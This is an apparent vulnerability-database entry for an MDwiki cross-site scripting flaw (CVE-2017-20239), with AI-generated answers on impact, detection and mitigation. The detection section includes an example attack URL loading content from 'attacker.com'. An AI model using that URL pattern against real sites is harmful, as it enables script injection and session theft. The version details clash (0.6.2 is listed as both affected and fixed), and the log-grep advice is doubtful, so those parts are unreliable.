CVE-2017-20239
Cross-Site Scripting in MDwiki via Unsanitized Location Hash
Publication date: 2026-04-12
Last updated on: 2026-04-17
Assigner: VulnCheck
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| dynalon | mdwiki | 0.6.2 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2017-20239 is a cross-site scripting (XSS) vulnerability in MDwiki versions prior to 0.6.2. It occurs because MDwiki improperly handles the URL hash fragment (the part after the '#' symbol). Attackers can craft URLs with malicious JavaScript payloads embedded in the hash parameter.
When a victim visits such a crafted URL, MDwiki extracts the hash value and uses it to fetch content dynamically via AJAX without proper sanitization. This content is then rendered as HTML in the victim's browser, allowing the injected malicious scripts to execute in the browser context.
The root cause is the lack of input validation and output sanitization on the dynamically loaded markdown content combined with client-side rendering, enabling attackers to execute arbitrary JavaScript remotely.
How can this vulnerability impact me? :
This vulnerability can allow remote attackers to execute arbitrary JavaScript code in the context of a victim's browser when they visit a specially crafted URL. This can lead to several impacts including theft of sensitive information such as cookies or session tokens, unauthorized actions performed on behalf of the user, and potential redirection to malicious sites.
Because the attack requires user interaction (visiting a malicious URL), it can be exploited through phishing or social engineering techniques.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking if your MDwiki installation is a version prior to 0.6.2, as these versions improperly handle URL hash fragments leading to cross-site scripting.
To detect exploitation attempts on your system or network, you can monitor HTTP requests for URLs containing suspicious or unexpected hash fragments with JavaScript payloads.
- Use web server logs to search for requests with URL fragments containing suspicious patterns, for example, using grep:
- grep -i '#!' /var/log/apache2/access.log
- Look for URLs with hash fragments that include external domains or script tags, e.g., URLs like mdwiki.html#!http://attacker.com/malicious.php
- Use browser developer tools or automated scanners to test if the MDwiki instance executes JavaScript injected via the location hash parameter.
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade MDwiki to version 0.6.2 or later, where this vulnerability has been addressed.
If upgrading is not immediately possible, restrict access to the vulnerable MDwiki instance to trusted users only and avoid clicking or sharing URLs containing hash fragments that could be malicious.
Additionally, consider implementing web application firewall (WAF) rules to block requests containing suspicious hash fragments or external URLs in the location hash.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The provided information does not specify how the CVE-2017-20239 vulnerability affects compliance with common standards and regulations such as GDPR or HIPAA.